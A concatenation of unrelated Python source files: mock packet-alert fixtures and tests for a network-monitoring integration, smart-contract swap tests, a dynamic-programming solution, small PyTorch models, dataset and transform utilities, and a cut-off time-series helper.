"description": "Anomaly: 60 minutes unknown-protocol was significantly more than average during this time",
"severity": "warning",
"count": 1,
"average": 0,
"minimum": 0,
"maximum": 0,
"standard_deviation": 0,
"anomaly_score": 1,
"observed_value": 805,
"deviation_from_norm": "8050.0",
"units": "bytes",
"address": "f8:2d:7c:2f:43:7c",
"device_details": {
"device_id": "5cc31d4b954fbc0e96c84eff",
"asset": "unmanaged",
"managed": "false",
"category": "mobile_phone",
"control": "user",
"host_name": "iPhone",
"os": "ios",
"os_version": "",
"ownership": "employee-owned",
"total_risk": 0.008771929824570352,
"type": "smart phone",
"username": "",
"managed_info": {
"host_name": ""
},
"ip": "",
"network": ""
}
}
FETCH_ALERTS = {
"total": 199,
"packet_alerts": [
{
"id": "<KEY>
"address": "7c:67:a2:37:77:51",
"timestamp": "2020-03-14T03:00:27Z",
"severity": "info",
"category": "User Activity Detected",
"signature": "ET POLICY Dropbox.com Offsite File Backup in Use",
"source": {
"city": "San Francisco",
"continent": "North America",
"country": "United States",
"ip": "4.4.4.4",
"latitude": 37.7697,
"longitude": -122.3933,
"mac": "c4:24:56:87:ef:11",
"network": "external",
"port": 443,
"state": "California",
"subnet": "",
"time_zone": "America/Los_Angeles",
"zip": "94107",
"inferred": {
"device_id": "",
"asset": "unmanaged",
"managed": "false",
"category": "",
"control": "",
"host_name": "",
"os": "",
"os_version": "",
"ownership": "",
"total_risk": 0,
"type": "",
"username": "",
"managed_info": {
"host_name": ""
}
}
},
"destination": {
"city": "Unknown",
"continent": "Unknown",
"country": "Unknown",
"ip": "2.2.2.2",
"latitude": -1,
"longitude": -1,
"mac": "7c:67:a2:37:77:51",
"network": "internal",
"port": 54250,
"state": "Unknown",
"subnet": "10.10.10.10/24",
"time_zone": "Unknown",
"zip": "Unknown",
"inferred": {
"device_id": "5b589f43e4b58d191f7e017c",
"asset": "managed",
"managed": "true",
"category": "computer",
"control": "user",
"host_name": "DESKTOP-73OV7ML",
"os": "windows",
"os_version": "10",
"ownership": "corporate",
"total_risk": 11.9,
"type": "computer",
"username": "7c67a2377751",
"managed_info": {
"host_name": "DESKTOP-73OV7ML"
}
}
},
"payload": """....C...?..^lH.....b.R.]...?..J..~.^....Lr1...........
.........#.......................0...0...........1.{....d.....\rR0\r
..*.H..\r.....0p1.0...U....US1.0...U.\n..Example Inc1.0...U....www.e
xample.com1/0-..U...&Example SHA2 High Assurance Server CA0..\r18081
6000000Z.\r201105120000Z0.1.0...U....US1.0...U...\nCalifornia1.0...U
...\rSan Francisco1.0...U.\n..Dropbox, Inc1.0...U....Dropbox Ops1.0.
..U...\r*.dropbox.com0..\"0\r..*.H..\r..........0..\n......1.$.#.jJ.
.ZQ.6..ku47kS..i.\r<.9...\r3...v.(.....Q..7.\n{.....$.i.i...^1.g.A.)
k......!Qq=.4.O:8k.+.(.-....-F1.U.9?|....I.....M..IA\n.I>.....'1....
.....:]:.I.d..nn.7.g\".b11.....8.EJS5....1u..6x...x....q\n@.~...I!..
.{~.u.nGk...CGr..^.y..l#...<x&V........J<.7..J..........v0..r0...U.#
..0...Qh.....u<..edb...Yr;0...U.......|...Xu3.z.R.RU..n8.0%..U....0.
.\r*.dropbox.com..dropbox.com0...U...........0...U.%..0...+.........
+.......0u..U...n0l04.2.0..http://crl3.example.com/sha2-ha-server-g6
.crl04.2.0..http://crl4.example.com/sha2-ha-server-g6.crl0L..U. .E0C
07..`.H...l..0*0(..+.........https://www.example.com/CPS0...g.....0.
...+........w0u0$..+.....0...http://ocsp.example.com0M..+.....0..Aht
tp://cacerts.example.com/ExampleSHA2HighAssuranceServerCA.crt0...U..
.....0.0....\n+.....y......o...k.i.w.......X......gp\n<5.......w...\
r.....eC.s......H0F.!..Hv..,O._rd....g.C*......V..cw.e.!..6.-.......
..K<A\".[..=.........1.w..u..Y|..C._..n.V.GV6.J.`....^......eC.t....
..H0F.!..`.;.(,&.u.B.$S(...3..B#...X4....!.....X[.DPQ..YhW.....j...8
./\n.6...u.......q...#...{G8W.\n.R....d6.......eC.t......F0D. v.y7Gs
.6Z..7(&(z..+t...w....tay.. _..6i........}6$...D..?7........0\r..*.H
..\r..........\r\"..R..IP..i.l...5.d..m.X.h#........9..T<...@...B.r.
BK #...$..z/.. u....~I.r...._..{.0|12G..2.!...{...Z..C.. 7.....>...\
n(F^..Y..z.H6..`9.....\\..\r{.[n2....I..........P.....+....~.......=
.....p...b.`FpRr.E..u..s..TG...._..n.........|..Km..$/u..;rHLe....<.
g.U...0...0...............\\..m.+B.]..0\r..*.H..\r.....0l1.0...U....
US1.0...U.\n..Example Inc1.0...U....www.example.com1+0)..U...\"Examp
le High Assurance EV Root CA0..\r131022120000Z.\r281022120000Z0p1.0.
..U....US1.0...U.\n..Example Inc1.0...U....www.example.com1/0-..U...
&Example SHA2 High Assurance Server CA0..\"0\r..*.H..\r..........0..
\n......./.$..m._..\nd..}\"&e..B@.....v.>.0U...O..Z..UV...*.....@...
;r............C:.......@....M._W..Ph................-..........^DX*7
..5...'2Z......Q.'..;B3..(..(...+#\rx.{.^q.J>........#.M.....u......
.D5e.S%9..\n.c...th\n7..RH.9Z...]... .!..&o.J!A..m..H/....h.S/^.....
....I0..E0...U.......0.......0...U...........0...U.%..0...+.........
+.......04..+........(0&0$..+.....0...http://ocsp.example.com0K..U..
.D0B0@.>.<.:http://crl4.example.com/ExampleHighAssuranceEVRootCA.crl
0=..U. .60402..U. .0*0(..+.........https://www.example.com/CPS0...U.
.....Qh.....u<..edb...Yr;0...U.#..0....>.i...G...&....cd+.0\r..*.H..
\r................m.\\..h.J...Q/.kD...c..nl.....q.[.4N..y.).-.j.. .y
...G.....Yq}...k.YX=..1%\\.8.......[.1N.x.....I..'..r.>..A...6...nGI
.^.H|....I..&B@.....d\nWT.....^k......r.V....0..0...N.W..$...+..u..-
..}y'............ (AYC(......{;redacted>..3.g.a.r..i...W@.p........*
...&... P..y&.U......0.....],..i...E.1@{...........\n...J.c32NO...j.
.'S7.N.in..,Q..[..~..eI#.w.O5./....G.M:..z.*..;`-....s'A.<Ce.;5\rE!.
(..\ng|TY.\r..RX..Db.,*.~...D...`...:Om....Pr6..(w@....w..$.GB7.Um..
.......X5....b......y).......C..2...../.W#.....Z....h\r..C....5^....
........AZ.....tw...).L..8b.............""",
"http": "null",
"type": "pkt_alert",
"group": "alert",
"subtype": "policy-violation",
"title": "User Activity Detected",
"description": "ET POLICY Dropbox.com Offsite File Backup in Use",
"references": [
"www.dropbox.com",
"dereknewton.com/2011/04/dropbox-authentication-static-host-ids/"
]
},
{
"id": "<KEY>
"address": "7c:67:a2:37:77:51",
"timestamp": "2020-03-13T23:46:14Z",
"severity": "info",
"category": "User Activity Detected",
"signature": "ET POLICY Dropbox.com Offsite File Backup in Use",
"source": {
"city": "San Francisco",
"continent": "North America",
"country": "United States",
"ip": "4.4.4.4",
"latitude": 37.7697,
"longitude": -122.3933,
"mac": "c4:24:56:87:ef:11",
"network": "external",
"port": 443,
"state": "California",
"subnet": "",
"time_zone": "America/Los_Angeles",
"zip": "94107",
"inferred": {
"device_id": "",
"asset": "unmanaged",
"managed": "false",
"category": "",
"control": "",
"host_name": "",
"os": "",
"os_version": "",
"ownership": "",
"total_risk": 0,
"type": "",
"username": "",
"managed_info": {
"host_name": ""
}
}
},
"destination": {
"city": "Unknown",
"continent": "Unknown",
"country": "Unknown",
"ip": "2.2.2.2",
"latitude": -1,
"longitude": -1,
"mac": "7c:67:a2:37:77:51",
"network": "internal",
"port": 54131,
"state": "Unknown",
"subnet": "10.10.10.10/24",
"time_zone": "Unknown",
"zip": "Unknown",
"inferred": {
"device_id": "5b589f43e4b58d191f7e017c",
"asset": "managed",
"managed": "true",
"category": "computer",
"control": "user",
"host_name": "DESKTOP-73OV7ML",
"os": "windows",
"os_version": "10",
"ownership": "corporate",
"total_risk": 11.9,
"type": "computer",
"username": "7c67a2377751",
"managed_info": {
"host_name": "DESKTOP-73OV7ML"
}
}
},
"payload": """....C...?..^l.Fy.5.7.k..t..............:..............
.........#.......................0...0...........1.{....d.....\rR0\r
..*.H..\r.....0p1.0...U....US1.0...U.\n..Example Inc1.0...U....www.e
xample.com1/0-..U...&Example SHA2 High Assurance Server CA0..\r18081
6000000Z.\r201105120000Z0.1.0...U....US1.0...U...\nCalifornia1.0...U
...\rSan Francisco1.0...U.\n..Dropbox, Inc1.0...U....Dropbox Ops1.0.
..U...\r*.dropbox.com0..\"0\r..*.H..\r..........0..\n......1.$.#.jJ.
.ZQ.6..ku47kS..i.\r<.9...\r3...v.(.....Q..7.\n{.....$.i.i...^1.g.A.)
k......!Qq=.4.O:8k.+.(.-....-F1.U.9?|....I.....M..IA\n.I>.....'1....
.....:]:.I.d..nn.7.g\".b11.....8.EJS5....1u..6x...x....q\n@.~...I!..
.{~.u.nGk...CGr..^.y..l#...<x&V........J<.7..J..........v0..r0...U.#
..0...Qh.....u<..edb...Yr;0...U.......|...Xu3.z.R.RU..n8.0%..U....0.
.\r*.dropbox.com..dropbox.com0...U...........0...U.%..0...+.........
+.......0u..U...n0l04.2.0..http://crl3.example.com/sha2-ha-server-g6
.crl04.2.0..http://crl4.example.com/sha2-ha-server-g6.crl0L..U. .E0C
07..`.H...l..0*0(..+.........https://www.example.com/CPS0...g.....0.
...+........w0u0$..+.....0...http://ocsp.example.com0M..+.....0..Aht
tp://cacerts.example.com/ExampleSHA2HighAssuranceServerCA.crt0...U..
.....0.0....\n+.....y......o...k.i.w.......X......gp\n<5.......w...\
r.....eC.s......H0F.!..Hv..,O._rd....g.C*......V..cw.e.!..6.-.......
..K<A\".[..=.........1.w..u..Y|..C._..n.V.GV6.J.`....^......eC.t....
..H0F.!..`.;.(,&.u.B.$S(...3..B#...X4....!.....X[.DPQ..YhW.....j...8
./\n.6...u.......q...#...{G8W.\n.R....d6.......eC.t......F0D. v.y7Gs
.6Z..7(&(z..+t...w....tay.. _..6i........}6$...D..?7........0\r..*.H
..\r..........\r\"..R..IP..i.l...5.d..m.X.h#........9..T<...@...B.r.
BK #...$..z/.. u....~I.r...._..{.0|12G..2.!...{...Z..C.. 7.....>...\
n(F^..Y..z.H6..`9.....\\..\r{.[n2....I..........P.....+....~.......=
.....p...b.`FpRr.E..u..s..TG...._..n.........|..Km..$/u..;rHLe....<.
g.U...0...0...............\\..m.+B.]..0\r..*.H..\r.....0l1.0...U....
US1.0...U.\n..Example Inc1.0...U....www.example.com1+0)..U...\"Examp
le High Assurance EV Root CA0..\r131022120000Z.\r281022120000Z0p1.0.
..U....US1.0...U.\n..Example Inc1.0...U....www.example.com1/0-..U...
&Example SHA2 High Assurance Server CA0..\"0\r..*.H..\r..........0..
\n......./.$..m._..\nd..}\"&e..B@.....v.>.0U...O..Z..UV...*.....@...
;r............C:.......@....M._W..Ph................-..........^DX*7
..5...'2Z......Q.'..;B3..(..(...+#\rx.{.^q.J>........#.M.....u......
.D5e.S%9..\n.c...th\n7..RH.9Z...]... .!..&o.J!A..m..H/....h.S/^.....
....I0..E0...U.......0.......0...U...........0...U.%..0...+.........
+.......04..+........(0&0$..+.....0...http://ocsp.example.com0K..U..
.D0B0@.>.<.:http://crl4.example.com/ExampleHighAssuranceEVRootCA.crl
0=..U. .60402..U. .0*0(..+.........https://www.example.com/CPS0...U.
.....Qh.....u<..edb...Yr;0...U.#..0....>.i...G...&....cd+.0\r..*.H..
\r................m.\\..h.J...Q/.kD...c..nl.....q.[.4N..y.).-.j.. .y
...G.....Yq}...k.YX=..1%\\.8.......[.1N.x.....I..'..r.>..A...6...nGI
.^.H|....I..&B@.....d\nWT.....^k......r.V....0..0...N.W..$...+..u..-
..}y'............ (AYC(......{;redacted>..3.g.a.r..i...W@.p........*
...&... .wf.\n$2..[..@&km...7m...~.B.......@8^.t.,..;.;...D..2..G'..
.G\"...=..E\\..44.........J.R+....Ms.c.w......%J.(K.gl.;\\.....Um..Z
....kR)...m[...N..k...&..D<.Y.\".....K...\n.......J.&.S{rX...5.H...#
>.`8-G....7..s..@...q^... .Y.....*dHW......:.....7..|.(...O..c.r^..I
ct..........5......x...G...\\h.B..........""",
"http": "null",
"type": "pkt_alert",
"group": "alert",
"subtype": "policy-violation",
"title": "User Activity Detected",
"description": "ET POLICY Dropbox.com Offsite File Backup in Use",
"references": [
"www.dropbox.com",
"dereknewton.com/2011/04/dropbox-authentication-static-host-ids/"
]
},
{
"id": "<KEY>",
"address": "34:f6:4b:b9:97:4a",
"timestamp": "2020-03-13T22:14:32Z",
"severity": "medium",
"category": "User Activity Detected",
"signature": "ET POLICY Cloudflare DNS Over HTTPS Certificate Inbound",
"source": {
"city": "Unknown",
"continent": "North America",
"country": "United States",
"ip": "192.168.3.11",
"latitude": 37.751,
"longitude": -97.822,
"mac": "c4:24:56:87:ef:11",
"network": "external",
"port": 443,
"state": "Unknown",
"subnet": "",
"time_zone": "Unknown",
"zip": "Unknown",
"inferred": {
"device_id": "",
"asset": "unmanaged",
"managed": "false",
"category": "",
"control": "",
"host_name": "",
"os": "",
"os_version": "",
"ownership": "",
"total_risk": 0,
"type": "",
"username": "",
"managed_info": {
"host_name": ""
}
}
},
"destination": {
"city": "Unknown",
"continent": "Unknown",
"country": "Unknown",
"ip": "4.4.4.4",
"latitude": -1,
"longitude": -1,
"mac": "34:f6:4b:b9:97:4a",
"network": "internal",
"port": 56402,
"state": "Unknown",
"subnet": "10.10.10.10/24",
"time_zone": "Unknown",
"zip": "Unknown",
"inferred": {
"device_id": "5a0b2a3eccd47205deb12fb3",
"asset": "managed",
"managed": "true",
"category": "computer",
"control": "user",
"host_name": "DESKTOP-BEJRPN4",
"os": "windows",
"os_version": "10",
"ownership": "corporate",
"total_risk": 0.11,
"type": "computer",
"username": "sakella",
"managed_info": {
"host_name": "DESKTOP-BEJRPN4"
}
}
},
"payload": """....L...H..^l....?B....e....I.BP...DOWNGRD...+.. .....
...............#.........h2...............0...0..L.............V..+$
.....0\n..*.H.=...0L1.0...U....US1.0...U.\n..Example Inc1&0$..U....E
xample ECC Secure Server CA0..\r190128000000Z.\r210201120000Z0r1.0..
.U....US1.0...U...\nCalifornia1.0...U...\rSan Francisco1.0...U.\n..C
loudflare, Inc.1.0...U....cloudflare-dns.com0Y0...*.H.=....*.H.=....
B... p. BP(.}DA|0y).c^.D...q:+.....l=j.w....PS...&.a7......].~....t.
...0...0...U.#..0.........9O.n......1.\n.0...U......p..\\..f........
..E..0....U.....0....cloudflare-dns.com..*.cloudflare-dns.com..one.o
ne.one.one.................5..&.G.G.............&.G.G.............&.
G.G..........d..&.G.G.........d.....$.......0...U...........0...U.%.
.0...+.........+.......0i..U...b0`0..,.*.(http://crl3.example.com/ss
ca-ecc-g1.crl0..,.*.(http://crl4.example.com/ssca-ecc-g1.crl0L..U. .
E0C07..`.H...l..0*0(..+.........https://www.example.com/CPS0...g....
.0{..+........o0m0$..+.....0...http://ocsp.example.com0E..+.....0..9
http://cacerts.example.com/ExampleECCSecureServerCA.crt0...U.......0
.0..~.\n+.....y......n...j.h.v.......X......gp\n<5.......w...\r.....
h.........G0E.!.....1{E..2.[4z......Mq...t.fA1H.. p...T..l..g..6I...
.F....o....1.J.u..u..Y|..C._..n.V.GV6.J.`....^......h...l.....F0D. P
..BL......B'1w.e..;..?.M#..\\.... ...'..b2...Ht.d. .Mn&.3...E..C...w
.......q...#...{G8W.\n.R....d6.......h.........H0F.!...=0s9.R......0
...!P...L....Sp...!....?=?.Aq..;..\nv...]a.#.3f.c....0\n..*.H.=....h
.0e.0{>..}.L.....F..vehk.zeQ.....N...{.^.4.>.......U..1..G.....';.X.
.p.,.:p.Vo7.....?...^ ..c8.O@.m........0...0..........\n.(.F^.9.vtp.
...0\r..*.H..\r.....0a1.0...U....US1.0...U.\n..Example Inc1.0...U...
.www.example.com1 0...U....Example Global Root CA0..\r130308120000Z.
\r230308120000Z0L1.0...U....US1.0...U.\n..Example Inc1&0$..U....Exam
ple ECC Secure Server CA0v0...*.H.=....+...\".b....B.w.$..,d...@.#r.
.\n.7?!6..S.....K....q......^....Z...So...?..[?G$......./.W..q..x:..
[<kd.+.4+....!0...0...U.......0.......0...U...........04..+........(
0&0$..+.....0...http://ocsp.example.com0B..U...;0907.5.3.1http://crl
3.example.com/ExampleGlobalRootCA.crl0=..U. .60402..U. .0*0(..+.....
....https://www.example.com/CPS0...U............9O.n......1.\n.0...U
.#..0.....P5V.L.f........=.U0\r..*.H..\r.............CK.t.....056n.V
{H..c.{.W$W.o...m........sd...7\n.I.?.&... ....*.f7.0...$.EH-..PJ1..
.._.*.I<a.y..f...*.{6X.,A.t...H.....Eq3.0zz.!.$..........j.w.5...'d.
C...wV....G.._(..hL..`...y.jv&... ..>.z(edf.....t.nM}........N..U..8
.4...?..Oj.t./*.s._..C.l.}...\".O..w....s...o... ...i)..8.I.bD.....q
<...].......S...G0E. p....#..u.._l.>..3xb.FV......{...!........\"...
...{_&k.d....!...n..#.........""",
"http": "null",
"type": "pkt_alert",
"group": "alert",
"subtype": "policy-violation",
"title": "User Activity Detected",
"description": "ET POLICY Cloudflare DNS Over HTTPS Certificate Inbound",
"references": [
"developers.cloudflare.com/1.1.1.1/dns-over-https/request-structure/"
]
}
]
}
def test_first_fetch_incidents(requests_mock, mocker):
client = Client(MOCK_URL + '/v1/', verify=True, headers=MOCK_HEADERS, auth=('test_user', 'test123'))
requests_mock.post(MOCK_URL + '/v1/events/packetalerts', json=FETCH_ALERTS)
fetch_incidents(client, 'packet')
def test_fetch_single_alert(requests_mock):
ID = 'eyJpIjoiU05XT09UQVBQUFJPRDAxXzEzMzIxNThfMDAwIiwidCI6IjIwMTktMDYtMjZUMjA6MjQ6MjZaIn0='
requests_mock.get(MOCK_URL + '/v1/events/packetalerts/' + ID, json=MOCK_PKT_ALERT)
client = Client(MOCK_URL + '/v1/', verify=True, headers=MOCK_HEADERS, auth=('test_user', 'test123'))
alert_type = "packet"
assert MOCK_PKT_ALERT == fetch_single_alert(client, ID, alert_type).raw_response
def test_get_woot_alerts(requests_mock):
client = Client(MOCK_URL + '/v1/', verify=True, headers=MOCK_HEADERS, auth=('test_user', 'test123'))
requests_mock.post(MOCK_URL + '/v1/events/anomalies', json=ANOMALY_ALERT)
assert ANOMALY_ALERT == client.get_woot_alerts('anomaly', MOCK_START, MOCK_END, limit='1').raw_response
|
11481887
|
from geoana.em.fdem.base import (
omega, wavenumber, skin_depth, sigma_hat, BaseFDEM
)
from geoana.em.fdem.wholespace import (
ElectricDipoleWholeSpace, MagneticDipoleWholeSpace
)
from geoana.em.fdem.halfspace import MagneticDipoleHalfSpace
from geoana.em.fdem.layered import MagneticDipoleLayeredHalfSpace
from geoana.em.fdem.simple_functions import (
vertical_magnetic_field_horizontal_loop, vertical_magnetic_flux_horizontal_loop
)
|
11481927
|
import brownie
import pytest
@pytest.fixture(scope="module")
def token_id(settler_sbtc):
return int(settler_sbtc.address, 16)
@pytest.fixture(scope="module", autouse=True)
def setup(alice, bob, swap, DAI, USDT, add_synths):
DAI._mint_for_testing(alice, 1_000_000 * 10 ** 18)
DAI.approve(swap, 2 ** 256 - 1, {"from": alice})
USDT._mint_for_testing(bob, 1_000_000 * 10 ** 6)
USDT.approve(swap, 2 ** 256 - 1, {"from": bob})
def test_swap_into_existing_increases_balance(
swap, alice, DAI, sUSD, sBTC, settler_sbtc, token_id
):
initial = sBTC.balanceOf(settler_sbtc)
amount = 1_000_000 * 10 ** 18
expected = swap.get_swap_into_synth_amount(DAI, sBTC, amount)
swap.swap_into_synth(DAI, sBTC, amount, 0, alice, token_id, {"from": alice})
assert DAI.balanceOf(alice) == 0
assert DAI.balanceOf(swap) == 0
assert DAI.balanceOf(settler_sbtc) == 0
assert sUSD.balanceOf(alice) == 0
assert sUSD.balanceOf(swap) == 0
assert sUSD.balanceOf(settler_sbtc) == 0
assert sBTC.balanceOf(alice) == 0
assert sBTC.balanceOf(swap) == 0
assert sBTC.balanceOf(settler_sbtc) == expected + initial
def test_swap_into_existing_does_not_mint(swap, alice, DAI, sBTC, token_id):
amount = 1_000_000 * 10 ** 18
tx = swap.swap_into_synth(DAI, sBTC, amount, 0, alice, token_id, {"from": alice})
new_token_id = tx.return_value
assert not tx.new_contracts
assert new_token_id == token_id
assert swap.balanceOf(alice) == 1
def test_only_owner(swap, alice, bob, DAI, sBTC, token_id):
amount = 1_000_000 * 10 ** 18
with brownie.reverts("Caller is not owner or operator"):
swap.swap_into_synth(DAI, sBTC, amount, 0, bob, token_id, {"from": bob})
def test_wrong_receiver(swap, alice, bob, DAI, sBTC, token_id):
amount = 1_000_000 * 10 ** 18
with brownie.reverts("Receiver is not owner"):
swap.swap_into_synth(DAI, sBTC, amount, 0, bob, token_id, {"from": alice})
def test_wrong_synth(swap, alice, DAI, sETH, token_id):
amount = 1_000_000 * 10 ** 18
with brownie.reverts("Incorrect synth for Token ID"):
swap.swap_into_synth(DAI, sETH, amount, 0, alice, token_id, {"from": alice})
def test_cannot_add_after_burn(chain, swap, alice, token_id, DAI, sBTC):
chain.mine(timedelta=600)
balance = swap.token_info(token_id)["underlying_balance"]
swap.withdraw(token_id, balance, {"from": alice})
with brownie.reverts("Unknown Token ID"):
swap.swap_into_synth(DAI, sBTC, 10 ** 18, 0, alice, token_id, {"from": alice})
def test_approved_operator(swap, alice, bob, USDT, sBTC, token_id):
amount = 1_000_000 * 10 ** 6
swap.setApprovalForAll(bob, True, {"from": alice})
swap.swap_into_synth(USDT, sBTC, amount, 0, alice, token_id, {"from": bob})
def test_approved_one_token_operator(swap, alice, bob, USDT, sBTC, token_id):
amount = 1_000_000 * 10 ** 6
swap.approve(bob, token_id, {"from": alice})
swap.swap_into_synth(USDT, sBTC, amount, 0, alice, token_id, {"from": bob})
|
11481973
|
from typing import List
class Solution:
def minCost(self, costs: List[List[int]]) -> int:
if not costs:
return 0
for i in range(1, len(costs)):
costs[i][0] += min(costs[i - 1][1], costs[i - 1][2])
costs[i][1] += min(costs[i - 1][0], costs[i - 1][2])
costs[i][2] += min(costs[i - 1][0], costs[i - 1][1])
return min(costs[-1])
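# Minimal usage sketch (illustrative, not part of the original solution): each row of
# ``costs`` is folded into the next, so costs[i][c] ends up holding the cheapest total
# when house i is painted colour c. For the classic example the answer is 10 (2 + 5 + 3):
#
#     assert Solution().minCost([[17, 2, 17], [16, 16, 5], [14, 3, 19]]) == 10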
|
11481983
|
import torch.nn as nn
import torch.nn.functional as F
import torch
from parlai.agents.hy_lib.common_modules import FeedForward
class PolicyNet(nn.Module):
def __init__(self, state_dim, action_dim):
super().__init__()
self.policy = FeedForward(state_dim, action_dim, hidden_sizes=(128, 64))
def forward(self, state):
action_score = self.policy(state)
action_prob = F.softmax(action_score, dim=-1)
return action_prob
class CriticNet(nn.Module):
def __init__(self, state_dim, action_dim):
super().__init__()
self.critic = FeedForward(state_dim + action_dim, 1, hidden_sizes=(128, 64))
def forward(self, state_actions):
val = self.critic(state_actions)
return val
|
11482015
|
from .body_class import BodyClass
class PyramidClass(BodyClass):
def __init__(self, S_main, S_back, h):
        # S_main - base area of the pyramid
        # S_back - lateral surface area
        # h - height of the pyramid
self.S_main = S_main
self.S_back = S_back
self.h = h
self.volume_calculation()
self.surface_area_calculation()
def surface_area_calculation(self):
self.surface_area = self.S_main + 4 * self.S_back
def volume_calculation(self):
self.volume = (1 / 3) * self.S_main * self.h
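# Minimal usage sketch (illustrative only; assumes BodyClass needs no constructor
# arguments of its own): with S_main=9, S_back=6 and h=4 the class computes
# volume (1 / 3) * 9 * 4 = 12 and surface area 9 + 4 * 6 = 33.
#
#     p = PyramidClass(S_main=9, S_back=6, h=4)
#     print(p.volume, p.surface_area)  # 12.0 33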
|
11482033
|
from setuptools import setup
setup(name="audino", version="0.1.0", packages=["audino"], include_package_data=True)
|
11482038
|
from __future__ import division
import random
import numpy as np
from PIL import Image
import torchvision.transforms as transforms
from . import co_transforms
def has_file_allowed_extension(filename, extensions):
"""Checks if a file is an allowed extension.
Args:
filename (string): path to a file
extensions (iterable of strings): extensions to consider (lowercase)
Returns:
bool: True if the filename ends with one of given extensions
"""
filename_lower = filename.lower()
return any(filename_lower.endswith(ext) for ext in extensions)
def is_image_file(filename):
"""Checks if a file is an allowed image extension.
Args:
filename (string): path to a file
Returns:
bool: True if the filename ends with a known image extension
"""
return has_file_allowed_extension(filename, IMG_EXTENSIONS)
def make_dataset(image_paths, class_idxs, extensions):
assert len(image_paths) == len(class_idxs)
images = []
for i, fp in enumerate(image_paths):
if has_file_allowed_extension(fp, extensions):
item = (fp, class_idxs[i])
images.append(item)
return images
def pil_loader(path):
# open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)
with open(path, 'rb') as f:
img = Image.open(f)
return img.convert('RGB')
def accimage_loader(path):
import accimage
try:
return accimage.Image(path)
except IOError:
# Potentially a decoding problem, fall back to PIL.Image
return pil_loader(path)
def default_loader(path):
from torchvision import get_image_backend
if get_image_backend() == 'accimage':
return accimage_loader(path)
else:
return pil_loader(path)
def get_sample_index(f_n, K, snippet_len, stride=1):
assert f_n > 0
snippet_len = snippet_len * stride
if f_n >= K * snippet_len:
avg_len = f_n // K
begin_idx = np.multiply(list(range(K)), avg_len) + np.random.randint(avg_len - snippet_len + 1)
idx_list = [list(range(bi, bi + snippet_len)) for bi in begin_idx]
elif f_n >= K:
sp_ind = np.array_split(range(f_n), K)
sp_ind = [list(sp) for sp in sp_ind]
idx_list = [lst + [lst[-1]] * (snippet_len - len(lst)) for lst in sp_ind]
else:
idx_list = np.sort(np.random.randint(f_n, size=K * snippet_len))
sp_ind = np.array_split(idx_list, K)
idx_list = [list(sp) for sp in sp_ind]
if stride > 1:
idx_list = [ind[::stride] for ind in idx_list]
return idx_list
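# Minimal illustration (not part of the original module): with f_n=10 frames,
# K=2 snippets and snippet_len=3 (stride=1), each snippet starts inside its own
# half of the clip, e.g. get_sample_index(10, 2, 3) could return
# [[1, 2, 3], [6, 7, 8]].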
IMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']
################## Get transforms ############################
class StaticRandomCrop(object):
def __init__(self, image_size, crop_size):
self.th, self.tw = crop_size
h, w = image_size
self.h1 = random.randint(0, h - self.th)
self.w1 = random.randint(0, w - self.tw)
def __call__(self, img):
return img[self.h1:(self.h1 + self.th), self.w1:(self.w1 + self.tw), :]
class StaticCenterCrop(object):
def __init__(self, image_size, crop_size):
self.th, self.tw = crop_size
self.h, self.w = image_size
def __call__(self, img):
return img[(self.h - self.th) // 2:(self.h + self.th) // 2, (self.w - self.tw) // 2:(self.w + self.tw) // 2, :]
"""
def get_transform(trans_size, is_train=True, sparse=False, div_flow=20.0, cr_rate=0.1,
val_full=False, fix_size=[256, 320], pre_scal_size=256):
input_transform = transforms.Compose([
co_transforms.ArrayToTensor(),
transforms.Normalize(mean=[0, 0, 0], std=[255, 255, 255]),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) # Changeed for vgg usage
])
target_transform = transforms.Compose([
co_transforms.ArrayToTensor(),
transforms.Normalize(mean=[0, 0], std=[div_flow, div_flow])
])
if is_train:
com_transform = co_transforms.Compose([
co_transforms.SmallEdgeScale(pre_scal_size),
co_transforms.RandomCropResize(trans_size, cr_rate),
# co_transforms.RandomVerticalFlip(),
co_transforms.RandomHorizontalFlip()
])
else:
com_transform = co_transforms.Compose([
co_transforms.FixSizeScale(fix_size) if val_full else co_transforms.CenterCrop(trans_size)
])
return input_transform, target_transform, com_transform
"""
def get_transform_flow(trans_size, is_train=True, sparse=False, div_flow=1.0, ct_type='1'):
input_transform = transforms.Compose([
co_transforms.ArrayToTensor(),
transforms.Normalize(mean=[0, 0, 0], std=[255, 255, 255]),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
"""
if ct_type == '1':
input_transform = transforms.Compose([
co_transforms.ArrayToTensor(),
transforms.Normalize(mean=[0, 0, 0], std=[255, 255, 255]),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
elif ct_type=='2':
input_transform = transforms.Compose([
co_transforms.ArrayToTensor(),
transforms.Normalize(mean=[0, 0, 0], std=[255, 255, 255]),
])
"""
target_transform = transforms.Compose([
co_transforms.ArrayToTensor(),
transforms.Normalize(mean=[0, 0], std=[div_flow, div_flow])
])
if is_train:
ct = []
if ct_type == '1' and not sparse:
ct.append(co_transforms.RandomCropResize(trans_size, 0.2))
else:
ct.append(co_transforms.RandomCrop(trans_size))
ct.append(co_transforms.RandomHorizontalFlip())
if ct_type != '3':
ct.append(co_transforms.RandomVerticalFlip())
com_transform = co_transforms.Compose(ct)
else:
ct = []
if ct_type == '1' and not sparse:
ct.append(co_transforms.FixSizeScale(trans_size))
else:
ct.append(co_transforms.CenterCrop(trans_size))
com_transform = co_transforms.Compose(ct)
return input_transform, target_transform, com_transform
|
11482123
|
import matplotlib.pyplot as plt
import numpy as np
import statsmodels.api as sm
import streamlit as st
def find_acf_pacf(timeseries, seasonality):
    '''
    Estimate the number of non-seasonal (p, q) and seasonal (P, Q) terms from
    the PACF and ACF of a time series.
    Args:
        timeseries (pandas Series): the time series to estimate the terms from
        seasonality (int): seasonal period; by default seasonality * 2 lags are
            considered when computing the ACF and PACF
    '''
fig = plt.figure(figsize=(10,5))
ax1 = plt.subplot(211)
ax2 = plt.subplot(212)
p_terms = 0
q_terms = 0
P_terms = 0
Q_terms = 0
lower_conf_int = -1.96/np.sqrt(len(timeseries.dropna()))
upper_conf_int = 1.96/np.sqrt(len(timeseries.dropna()))
pacf_values = sm.tsa.stattools.pacf(timeseries.dropna(), nlags = seasonality * 2, method='ywunbiased')
